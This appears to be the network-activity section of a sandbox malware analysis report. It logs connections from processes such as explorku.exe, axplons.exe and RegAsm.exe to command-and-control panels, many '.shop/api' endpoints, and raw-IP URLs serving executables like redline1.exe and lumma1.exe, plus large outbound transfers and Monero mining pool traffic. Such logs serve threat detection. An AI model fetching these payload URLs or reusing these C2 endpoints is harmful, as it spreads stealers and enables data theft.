    HTTP Request: GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8W36in6Q1Dxk2EpiBs_O0BDVUCUxfGo3XAaKNEi_wkyv2N0ebkLUMNYBtLxA9sdd2ciHWl2M3ddOb8SosBw-ZgBdVgcMbYG0gmsbpYD97LKcXUPu75m4WLKdc9TE_IYfN-XD7TKzUAfGbj0Wg6TgN-VgF7kM0XyFoBAaUMO03svQvnYJl%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy54Ym94LmNvbSUyZmdhbWVzJTJmY2FsbC1vZi1kdXR5LW1vZGVybi13YXJmYXJlLWlpaSUzZm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX0NvRCUyNmZvcm0lM2RNNTAwNlg%26rlid%3De3355c6480e316b3768a3a4f2fb762d3&TIME=20240426T134311Z&CID=531035994&EID=&tids=15000&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038&muid=416143B6C3858B3296EFB62827C91949
    HTTP Response: 204
  • 88.221.83.193:443
    URL: https://www.bing.com/aes/c.gif?RG=4faef17f38be412fa1aa6a1874b8b20c&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T134311Z&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038
    Protocol: tls, http2
    Bytes sent / received: 1.5kB / 5.4kB
    Packets sent / received: 17 / 12
    HTTP Request: GET https://www.bing.com/aes/c.gif?RG=4faef17f38be412fa1aa6a1874b8b20c&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T134311Z&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038
    HTTP Response: 200
  • 5.42.96.141:80
    URL: http://5.42.96.141/go34ko8/index.php
    Protocol: http
    Process: explorku.exe
    Bytes sent / received: 1.9kB / 2.2kB
    Packets sent / received: 17 / 14
    HTTP Request: POST http://5.42.96.141/go34ko8/index.php
    HTTP Response: 200
    HTTP Request: POST http://5.42.96.141/go34ko8/index.php
    HTTP Response: 200
    HTTP Response: 200
    HTTP Response: 200
    HTTP Response: 200
  • 88.221.83.193:443
    URL: https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
    Protocol: tls, http2
    Bytes sent / received: 1.6kB / 6.4kB
    Packets sent / received: 17 / 13
    HTTP Request: GET https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
    HTTP Response: 200
  • 5.42.96.7:80
    URL: http://5.42.96.7/cost/random.exe
    Protocol: http
    Process: explorku.exe
    Bytes sent / received: 226.3kB / 6.6MB
    Packets sent / received: 4729 / 4738
    HTTP Request: GET http://5.42.96.7/cost/sarra.exe
    HTTP Response: 200
    HTTP Request: GET http://5.42.96.7/mine/amers.exe
    HTTP Request: GET http://5.42.96.7/cost/random.exe
  • 5.42.96.7:80
    URL: http://5.42.96.7/zamo7h/index.php
    Protocol: http
    Process: axplons.exe
    Bytes sent / received: 207.8kB / 6.1MB
    Packets sent / received: 4390 / 4379
    HTTP Request: POST http://5.42.96.7/zamo7h/index.php
    HTTP Response: 200
    HTTP Request: POST http://5.42.96.7/zamo7h/index.php
    HTTP Response: 200
    HTTP Request: GET http://5.42.96.7/lend/alex.exe
    HTTP Response: 200
    HTTP Request: POST http://5.42.96.7/zamo7h/index.php
    HTTP Response: 200
    HTTP Request: GET http://5.42.96.7/lend/gold.exe
    HTTP Response: 200
    HTTP Request: POST http://5.42.96.7/zamo7h/index.php
    HTTP Response: 200
    HTTP Request: GET http://5.42.96.7/lend/redline1.exe
    HTTP Response: 200
    HTTP Request: POST http://5.42.96.7/zamo7h/index.php
    HTTP Response: 200
    HTTP Request: POST http://5.42.96.7/zamo7h/index.php
    HTTP Response: 200
    HTTP Request: GET http://5.42.96.7/lend/swizzhis.exe
    HTTP Response: 200
    HTTP Request: POST http://5.42.96.7/zamo7h/index.php
    HTTP Response: 200
    HTTP Request: GET http://5.42.96.7/lend/lumma1.exe
    HTTP Response: 200
    HTTP Request: POST http://5.42.96.7/zamo7h/index.php
    HTTP Response: 200
    HTTP Request: POST http://5.42.96.7/zamo7h/index.php
    HTTP Response: 200
  • 104.21.39.216:443
    URL: https://zippyfinickysofwps.shop/api
    Protocol: tls, http
    Process: RegAsm.exe
    Bytes sent / received: 1.5kB / 7.3kB
    Packets sent / received: 13 / 13
    HTTP Request: POST https://zippyfinickysofwps.shop/api
    HTTP Response: 200
    HTTP Request: POST https://zippyfinickysofwps.shop/api
    HTTP Response: 200
  • 188.114.97.2:443
    URL: https://acceptabledcooeprs.shop/api
    Protocol: tls, http
    Process: RegAsm.exe
    Bytes sent / received: 1.1kB / 6.3kB
    Packets sent / received: 10 / 10
    HTTP Request: POST https://acceptabledcooeprs.shop/api
    HTTP Response: 200
  • 185.172.128.33:8970
    Process: keks.exe
    Bytes sent / received: 5.1MB / 108.6kB
    Packets sent / received: 3872 / 2246
  • 104.21.20.88:443
    URL: https://obsceneclassyjuwks.shop/api
    Protocol: tls, http
    Process: RegAsm.exe
    Bytes sent / received: 1.1kB / 6.7kB
    Packets sent / received: 10 / 10
    HTTP Request: POST https://obsceneclassyjuwks.shop/api
    HTTP Response: 200
  • 77.221.151.47:80
    URL: http://77.221.151.47/install.exe
    Protocol: http
    Process: axplons.exe
    Bytes sent / received: 162.6kB / 4.6MB
    Packets sent / received: 3285 / 3283
    HTTP Request: GET http://77.221.151.47/install.exe
    HTTP Response: 200
  • 185.215.113.67:26260
    Process: redline1.exe
    Bytes sent / received: 5.3MB / 75.7kB
    Packets sent / received: 3893 / 1598
  • 104.21.30.191:443
    URL: https://miniaturefinerninewjs.shop/api
    Protocol: tls, http
    Process: RegAsm.exe
    Bytes sent / received: 1.1kB / 6.7kB
    Packets sent / received: 10 / 10
    HTTP Request: POST https://miniaturefinerninewjs.shop/api
    HTTP Response: 200
  • 104.21.53.146:443
    URL: https://plaintediousidowsko.shop/api
    Protocol: tls, http
    Process: RegAsm.exe
    Bytes sent / received: 1.1kB / 6.7kB
    Packets sent / received: 10 / 10
    HTTP Request: POST https://plaintediousidowsko.shop/api
    HTTP Response: 200
  • 104.21.44.201:443
    URL: https://sweetsquarediaslw.shop/api
    Protocol: tls, http
    Process: RegAsm.exe
    Bytes sent / received: 1.1kB / 6.7kB
    Packets sent / received: 10 / 10
    HTTP Request: POST https://sweetsquarediaslw.shop/api
    HTTP Response: 200
  • 104.21.40.92:443
    URL: https://holicisticscrarws.shop/api
    Protocol: tls, http
    Process: RegAsm.exe
    Bytes sent / received: 1.1kB / 6.3kB
    Packets sent / received: 11 / 10
    HTTP Request: POST https://holicisticscrarws.shop/api
    HTTP Response: 200
  • 172.67.186.30:443
    URL: https://boredimperissvieos.shop/api
    Protocol: tls, http
    Process: RegAsm.exe
    Bytes sent / received: 1.1kB / 6.3kB
    Packets sent / received: 10 / 10
    HTTP Request: POST https://boredimperissvieos.shop/api
    HTTP Response: 200
  • 49.13.229.86:80
    Process: RegAsm.exe
    Bytes: 260 B
    Packets: 5
  • 185.172.128.19:80
    URL: http://185.172.128.19/NewB.exe
    Protocol: http
    Process: axplons.exe
    Bytes sent / received: 15.5kB / 442.2kB
    Packets sent / received: 335 / 334
    HTTP Request: GET http://185.172.128.19/NewB.exe
    HTTP Response: 200
  • 172.67.162.147:443
    URL: https://smallelementyjdui.shop/api
    Protocol: tls, http
    Process: RegAsm.exe
    Bytes sent / received: 1.6kB / 7.4kB
    Packets sent / received: 14 / 14
    HTTP Request: POST https://smallelementyjdui.shop/api
    HTTP Response: 200
    HTTP Request: POST https://smallelementyjdui.shop/api
    HTTP Response: 200
  • 185.172.128.19:80
    URL: http://185.172.128.19/ghsdh39s/index.php
    Protocol: http
    Process: NewB.exe
    Bytes sent / received: 97.4kB / 2.8MB
    Packets sent / received: 2070 / 2061
    HTTP Request: POST http://185.172.128.19/ghsdh39s/index.php
    HTTP Response: 200
    HTTP Request: POST http://185.172.128.19/ghsdh39s/index.php
    HTTP Response: 200
    HTTP Request: POST http://185.172.128.19/ghsdh39s/index.php
    HTTP Response: 200
    HTTP Request: POST http://185.172.128.19/ghsdh39s/index.php
    HTTP Response: 200
    HTTP Request: POST http://185.172.128.19/ghsdh39s/index.php
    HTTP Response: 200
    HTTP Request: GET http://185.172.128.19/FirstZ.exe
    HTTP Response: 200
    HTTP Request: POST http://185.172.128.19/ghsdh39s/index.php
    HTTP Response: 200
                                                                                    • 5.42.67.23:80
                                                                                      http://5.42.67.23/dl.php?pub=mixeight
                                                                                      http
                                                                                      NewB.exe
                                                                                      10.8kB
                                                                                      299.7kB
                                                                                      233
                                                                                      227

                                                                                      HTTP Request

                                                                                      GET http://5.42.67.23/dl.php?pub=mixeight

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 104.21.95.16:443
                                                                                      https://sofaprivateawarderysj.shop/api
                                                                                      tls, http
                                                                                      RegAsm.exe
                                                                                      1.1kB
                                                                                      6.7kB
                                                                                      10
                                                                                      10

                                                                                      HTTP Request

                                                                                      POST https://sofaprivateawarderysj.shop/api

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 77.221.151.47:8080
                                                                                      PiercingNetLink.exe
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 172.67.141.60:443
                                                                                      https://lineagelasserytailsd.shop/api
                                                                                      tls, http
                                                                                      RegAsm.exe
                                                                                      1.1kB
                                                                                      6.7kB
                                                                                      10
                                                                                      10

                                                                                      HTTP Request

                                                                                      POST https://lineagelasserytailsd.shop/api

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 172.67.205.185:443
                                                                                      https://tendencyportionjsuk.shop/api
                                                                                      tls, http
                                                                                      RegAsm.exe
                                                                                      1.1kB
                                                                                      6.3kB
                                                                                      10
                                                                                      10

                                                                                      HTTP Request

                                                                                      POST https://tendencyportionjsuk.shop/api

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 104.21.50.137:443
                                                                                      https://headraisepresidensu.shop/api
                                                                                      tls, http
                                                                                      RegAsm.exe
                                                                                      1.1kB
                                                                                      6.3kB
                                                                                      10
                                                                                      10

                                                                                      HTTP Request

                                                                                      POST https://headraisepresidensu.shop/api

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 5.101.50.183:80
                                                                                      http://file-file-host6.com/downloads/toolspub1.exe
                                                                                      http
                                                                                      NewB.exe
                                                                                      8.1kB
                                                                                      237.1kB
                                                                                      175
                                                                                      173

                                                                                      HTTP Request

                                                                                      GET http://file-file-host6.com/downloads/toolspub1.exe

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 104.21.48.123:443
                                                                                      https://appetitesallooonsj.shop/api
                                                                                      tls, http
                                                                                      RegAsm.exe
                                                                                      1.1kB
                                                                                      6.7kB
                                                                                      11
                                                                                      10

                                                                                      HTTP Request

                                                                                      POST https://appetitesallooonsj.shop/api

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 172.67.187.204:443
                                                                                      https://parrotflight.com/4767d2e713f2021e8fe856e3ea638b58.exe
                                                                                      tls, http
                                                                                      NewB.exe
                                                                                      1.0kB
                                                                                      6.7kB
                                                                                      14
                                                                                      10

                                                                                      HTTP Request

                                                                                      GET https://parrotflight.com/4767d2e713f2021e8fe856e3ea638b58.exe

                                                                                      HTTP Response

                                                                                      307
                                                                                    • 188.114.96.2:443
                                                                                      https://minorittyeffeoos.shop/api
                                                                                      tls, http
                                                                                      RegAsm.exe
                                                                                      1.1kB
                                                                                      6.7kB
                                                                                      10
                                                                                      10

                                                                                      HTTP Request

                                                                                      POST https://minorittyeffeoos.shop/api

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 104.21.92.157:443
                                                                                      https://prideconstituiiosjk.shop/api
                                                                                      tls, http
                                                                                      RegAsm.exe
                                                                                      1.1kB
                                                                                      6.7kB
                                                                                      10
                                                                                      10

                                                                                      HTTP Request

                                                                                      POST https://prideconstituiiosjk.shop/api

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 104.21.92.190:443
                                                                                      https://junglethomas.com/ab6c5b0141ae7b82616164b5c7473c92/4767d2e713f2021e8fe856e3ea638b58.exe
                                                                                      tls, http
                                                                                      NewB.exe
                                                                                      191.8kB
                                                                                      4.5MB
                                                                                      3224
                                                                                      3214

                                                                                      HTTP Request

                                                                                      GET https://junglethomas.com/ab6c5b0141ae7b82616164b5c7473c92/4767d2e713f2021e8fe856e3ea638b58.exe

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 77.221.151.47:8080
                                                                                      PiercingNetLink.exe
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 185.172.128.90:80
                                                                                      http://185.172.128.90/cpa/name.php
                                                                                      http
                                                                                      dl.exe
                                                                                      578 B
                                                                                      92 B
                                                                                      4
                                                                                      2

                                                                                      HTTP Request

                                                                                      GET http://185.172.128.90/cpa/name.php
                                                                                    • 77.221.151.47:8080
                                                                                      PiercingNetLink.exe
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 77.221.151.47:9090
                                                                                      GameSyncLinks.exe
                                                                                      404 B
                                                                                      608 B
                                                                                      6
                                                                                      7
                                                                                    • 5.42.65.67:48396
                                                                                      trf.exe
                                                                                      5.0MB
                                                                                      69.3kB
                                                                                      3794
                                                                                      1406
                                                                                    • 162.19.139.184:2222
                                                                                      xmr.2miners.com
                                                                                      850308.exe
                                                                                      1.1kB
                                                                                      1.9kB
                                                                                      11
                                                                                      10
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 49.13.229.86:80
                                                                                      260 B
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      399 B
                                                                                      268 B
                                                                                      6
                                                                                      5
                                                                                    • 49.13.229.86:80
                                                                                      260 B
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 185.172.128.90:80
                                                                                      http://185.172.128.90/cpa/name.php
                                                                                      http
                                                                                      578 B
                                                                                      92 B
                                                                                      4
                                                                                      2

                                                                                      HTTP Request

                                                                                      GET http://185.172.128.90/cpa/name.php
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 49.13.229.86:80
                                                                                      260 B
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 77.221.151.47:9090
                                                                                      2.3kB
                                                                                      268 B
                                                                                      6
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 185.172.128.90:80
                                                                                      http://185.172.128.90/cpa/name.php
                                                                                      http
                                                                                      532 B
                                                                                      92 B
                                                                                      3
                                                                                      2

                                                                                      HTTP Request

                                                                                      GET http://185.172.128.90/cpa/name.php
                                                                                    • 49.13.229.86:80
                                                                                      260 B
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
                                                                                    • 77.221.151.47:8080
                                                                                      353 B
                                                                                      268 B
                                                                                      5
                                                                                      5
Flow columns: destination  host  proto  [process]  bytes sent / received  packets sent / received

• 51.195.43.17:10943  zeph-eu2.nanopool.org  tls  1.4kB / 3.1kB  8 / 6
• 77.221.151.47:8080  353 B / 268 B  5 / 5
• 77.221.151.47:8080  353 B / 268 B  5 / 5
• 8.8.8.8:53  g.bing.com  dns  56 B / 151 B  1 / 1
    DNS request: g.bing.com
    DNS response: 204.79.197.237, 13.107.21.237
• 8.8.8.8:53  196.249.167.52.in-addr.arpa  dns  73 B / 147 B  1 / 1
    DNS request: 196.249.167.52.in-addr.arpa
• 8.8.8.8:53  240.197.17.2.in-addr.arpa  dns  71 B / 135 B  1 / 1
    DNS request: 240.197.17.2.in-addr.arpa
• 8.8.8.8:53  237.197.79.204.in-addr.arpa  dns  73 B / 143 B  1 / 1
    DNS request: 237.197.79.204.in-addr.arpa
• 8.8.8.8:53  95.221.229.192.in-addr.arpa  dns  73 B / 144 B  1 / 1
    DNS request: 95.221.229.192.in-addr.arpa
• 8.8.8.8:53  14.160.190.20.in-addr.arpa  dns  72 B / 158 B  1 / 1
    DNS request: 14.160.190.20.in-addr.arpa
• 8.8.8.8:53  193.83.221.88.in-addr.arpa  dns  72 B / 137 B  1 / 1
    DNS request: 193.83.221.88.in-addr.arpa
• 8.8.8.8:53  88.156.103.20.in-addr.arpa  dns  72 B / 158 B  1 / 1
    DNS request: 88.156.103.20.in-addr.arpa
• 8.8.8.8:53  141.96.42.5.in-addr.arpa  dns  70 B / 130 B  1 / 1
    DNS request: 141.96.42.5.in-addr.arpa
• 8.8.8.8:53  7.96.42.5.in-addr.arpa  dns  68 B / 128 B  1 / 1
    DNS request: 7.96.42.5.in-addr.arpa
• 8.8.8.8:53  133.211.185.52.in-addr.arpa  dns  73 B / 147 B  1 / 1
    DNS request: 133.211.185.52.in-addr.arpa
• 8.8.8.8:53  228.249.119.40.in-addr.arpa  dns  73 B / 159 B  1 / 1
    DNS request: 228.249.119.40.in-addr.arpa
• 8.8.8.8:53  zippyfinickysofwps.shop  dns  RegAsm.exe  69 B / 101 B  1 / 1
    DNS request: zippyfinickysofwps.shop
    DNS response: 104.21.39.216, 172.67.148.231
• 8.8.8.8:53  acceptabledcooeprs.shop  dns  RegAsm.exe  69 B / 101 B  1 / 1
    DNS request: acceptabledcooeprs.shop
    DNS response: 188.114.97.2, 188.114.96.2
• 8.8.8.8:53  216.39.21.104.in-addr.arpa  dns  72 B / 134 B  1 / 1
    DNS request: 216.39.21.104.in-addr.arpa
• 8.8.8.8:53  2.97.114.188.in-addr.arpa  dns  71 B / 133 B  1 / 1
    DNS request: 2.97.114.188.in-addr.arpa
• 8.8.8.8:53  33.128.172.185.in-addr.arpa  dns  73 B / 73 B  1 / 1
    DNS request: 33.128.172.185.in-addr.arpa
• 8.8.8.8:53  obsceneclassyjuwks.shop  dns  RegAsm.exe  69 B / 101 B  1 / 1
    DNS request: obsceneclassyjuwks.shop
    DNS response: 104.21.20.88, 172.67.192.5
• 8.8.8.8:53  miniaturefinerninewjs.shop  dns  RegAsm.exe  72 B / 104 B  1 / 1
    DNS request: miniaturefinerninewjs.shop
    DNS response: 104.21.30.191, 172.67.173.139
• 8.8.8.8:53  plaintediousidowsko.shop  dns  RegAsm.exe  70 B / 102 B  1 / 1
    DNS request: plaintediousidowsko.shop
    DNS response: 104.21.53.146, 172.67.213.139
• 8.8.8.8:53  sweetsquarediaslw.shop  dns  RegAsm.exe  68 B / 100 B  1 / 1
    DNS request: sweetsquarediaslw.shop
    DNS response: 104.21.44.201, 172.67.203.170
• 8.8.8.8:53  holicisticscrarws.shop  dns  RegAsm.exe  68 B / 100 B  1 / 1
    DNS request: holicisticscrarws.shop
    DNS response: 104.21.40.92, 172.67.183.72
• 8.8.8.8:53  88.20.21.104.in-addr.arpa  dns  71 B / 133 B  1 / 1
    DNS request: 88.20.21.104.in-addr.arpa
• 8.8.8.8:53  47.151.221.77.in-addr.arpa  dns  72 B / 132 B  1 / 1
    DNS request: 47.151.221.77.in-addr.arpa
• 8.8.8.8:53  67.113.215.185.in-addr.arpa  dns  73 B / 133 B  1 / 1
    DNS request: 67.113.215.185.in-addr.arpa
• 8.8.8.8:53  191.30.21.104.in-addr.arpa  dns  72 B / 134 B  1 / 1
    DNS request: 191.30.21.104.in-addr.arpa
• 8.8.8.8:53  146.53.21.104.in-addr.arpa  dns  72 B / 134 B  1 / 1
    DNS request: 146.53.21.104.in-addr.arpa
• 8.8.8.8:53  201.44.21.104.in-addr.arpa  dns  72 B / 134 B  1 / 1
    DNS request: 201.44.21.104.in-addr.arpa
• 8.8.8.8:53  boredimperissvieos.shop  dns  RegAsm.exe  69 B / 101 B  1 / 1
    DNS request: boredimperissvieos.shop
    DNS response: 172.67.186.30, 104.21.72.135
• 8.8.8.8:53  92.40.21.104.in-addr.arpa  dns  71 B / 133 B  1 / 1
    DNS request: 92.40.21.104.in-addr.arpa
• 8.8.8.8:53  30.186.67.172.in-addr.arpa  dns  72 B / 134 B  1 / 1
    DNS request: 30.186.67.172.in-addr.arpa
• 8.8.8.8:53  26.165.165.52.in-addr.arpa  dns  72 B / 146 B  1 / 1
    DNS request: 26.165.165.52.in-addr.arpa
• 8.8.8.8:53  206.23.85.13.in-addr.arpa  dns  71 B / 145 B  1 / 1
    DNS request: 206.23.85.13.in-addr.arpa
• 8.8.8.8:53  19.128.172.185.in-addr.arpa  dns  73 B / 73 B  1 / 1
    DNS request: 19.128.172.185.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      smallelementyjdui.shop
                                                                                      dns
                                                                                      RegAsm.exe
                                                                                      136 B
                                                                                      200 B
                                                                                      2
                                                                                      2

                                                                                      DNS Request

                                                                                      smallelementyjdui.shop

                                                                                      DNS Response

                                                                                      172.67.162.147
                                                                                      104.21.15.116

                                                                                      DNS Request

                                                                                      smallelementyjdui.shop

                                                                                      DNS Response

                                                                                      172.67.162.147
                                                                                      104.21.15.116

                                                                                    • 8.8.8.8:53
                                                                                      sofaprivateawarderysj.shop
                                                                                      dns
                                                                                      RegAsm.exe
                                                                                      144 B
                                                                                      208 B
                                                                                      2
                                                                                      2

                                                                                      DNS Request

                                                                                      sofaprivateawarderysj.shop

                                                                                      DNS Response

                                                                                      104.21.95.16
                                                                                      172.67.169.40

                                                                                      DNS Request

                                                                                      sofaprivateawarderysj.shop

                                                                                      DNS Response

                                                                                      172.67.169.40
                                                                                      104.21.95.16

                                                                                    • 8.8.8.8:53
                                                                                      98.58.20.217.in-addr.arpa
                                                                                      dns
                                                                                      71 B
                                                                                      131 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      98.58.20.217.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      147.162.67.172.in-addr.arpa
                                                                                      dns
                                                                                      73 B
                                                                                      135 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      147.162.67.172.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      23.67.42.5.in-addr.arpa
                                                                                      dns
                                                                                      69 B
                                                                                      129 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      23.67.42.5.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      lineagelasserytailsd.shop
                                                                                      dns
                                                                                      RegAsm.exe
                                                                                      71 B
                                                                                      103 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      lineagelasserytailsd.shop

                                                                                      DNS Response

                                                                                      172.67.141.60
                                                                                      104.21.62.251

                                                                                    • 8.8.8.8:53
                                                                                      tendencyportionjsuk.shop
                                                                                      dns
                                                                                      RegAsm.exe
                                                                                      70 B
                                                                                      102 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      tendencyportionjsuk.shop

                                                                                      DNS Response

                                                                                      172.67.205.185
                                                                                      104.21.85.127

                                                                                    • 8.8.8.8:53
                                                                                      16.95.21.104.in-addr.arpa
                                                                                      dns
                                                                                      71 B
                                                                                      133 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      16.95.21.104.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      60.141.67.172.in-addr.arpa
                                                                                      dns
                                                                                      72 B
                                                                                      134 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      60.141.67.172.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      185.205.67.172.in-addr.arpa
                                                                                      dns
                                                                                      146 B
                                                                                      270 B
                                                                                      2
                                                                                      2

                                                                                      DNS Request

                                                                                      185.205.67.172.in-addr.arpa

                                                                                      DNS Request

                                                                                      185.205.67.172.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      headraisepresidensu.shop
                                                                                      dns
                                                                                      RegAsm.exe
                                                                                      70 B
                                                                                      102 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      headraisepresidensu.shop

                                                                                      DNS Response

                                                                                      104.21.50.137
                                                                                      172.67.206.145

                                                                                    • 8.8.8.8:53
                                                                                      file-file-host6.com
                                                                                      dns
                                                                                      NewB.exe
                                                                                      130 B
                                                                                      162 B
                                                                                      2
                                                                                      2

                                                                                      DNS Request

                                                                                      file-file-host6.com

                                                                                      DNS Request

                                                                                      file-file-host6.com

                                                                                      DNS Response

                                                                                      5.101.50.183

                                                                                      DNS Response

                                                                                      5.101.50.183

                                                                                    • 8.8.8.8:53
                                                                                      appetitesallooonsj.shop
                                                                                      dns
                                                                                      RegAsm.exe
                                                                                      69 B
                                                                                      101 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      appetitesallooonsj.shop

                                                                                      DNS Response

                                                                                      104.21.48.123
                                                                                      172.67.151.60

                                                                                    • 8.8.8.8:53
                                                                                      137.50.21.104.in-addr.arpa
                                                                                      dns
                                                                                      72 B
                                                                                      134 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      137.50.21.104.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      183.50.101.5.in-addr.arpa
                                                                                      dns
                                                                                      142 B
                                                                                      192 B
                                                                                      2
                                                                                      2

                                                                                      DNS Request

                                                                                      183.50.101.5.in-addr.arpa

                                                                                      DNS Request

                                                                                      183.50.101.5.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      parrotflight.com
                                                                                      dns
                                                                                      NewB.exe
                                                                                      62 B
                                                                                      94 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      parrotflight.com

                                                                                      DNS Response

                                                                                      172.67.187.204
                                                                                      104.21.84.71

                                                                                    • 8.8.8.8:53
                                                                                      minorittyeffeoos.shop
                                                                                      dns
                                                                                      RegAsm.exe
                                                                                      67 B
                                                                                      99 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      minorittyeffeoos.shop

                                                                                      DNS Response

                                                                                      188.114.96.2
                                                                                      188.114.97.2

                                                                                    • 8.8.8.8:53
                                                                                      prideconstituiiosjk.shop
                                                                                      dns
                                                                                      RegAsm.exe
                                                                                      70 B
                                                                                      102 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      prideconstituiiosjk.shop

                                                                                      DNS Response

                                                                                      104.21.92.157
                                                                                      172.67.195.106

                                                                                    • 8.8.8.8:53
                                                                                      123.48.21.104.in-addr.arpa
                                                                                      dns
                                                                                      72 B
                                                                                      134 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      123.48.21.104.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      204.187.67.172.in-addr.arpa
                                                                                      dns
                                                                                      73 B
                                                                                      135 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      204.187.67.172.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      2.96.114.188.in-addr.arpa
                                                                                      dns
                                                                                      71 B
                                                                                      133 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      2.96.114.188.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      67.179.250.142.in-addr.arpa
                                                                                      dns
                                                                                      73 B
                                                                                      111 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      67.179.250.142.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      junglethomas.com
                                                                                      dns
                                                                                      NewB.exe
                                                                                      62 B
                                                                                      94 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      junglethomas.com

                                                                                      DNS Response

                                                                                      104.21.92.190
                                                                                      172.67.197.33

                                                                                    • 8.8.8.8:53
                                                                                      157.92.21.104.in-addr.arpa
                                                                                      dns
                                                                                      72 B
                                                                                      134 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      157.92.21.104.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      190.92.21.104.in-addr.arpa
                                                                                      dns
                                                                                      72 B
                                                                                      134 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      190.92.21.104.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      90.128.172.185.in-addr.arpa
                                                                                      dns
                                                                                      73 B
                                                                                      73 B
                                                                                      1
                                                                                      1

                                                                                      DNS Request

                                                                                      90.128.172.185.in-addr.arpa

                                                                                    • 8.8.8.8:53
                                                                                      xmr.2miners.com
                                                                                      dns
                                                                                      850308.exe
                                                                                      61 B
                                                                                      77 B
                                                                                      1
  1
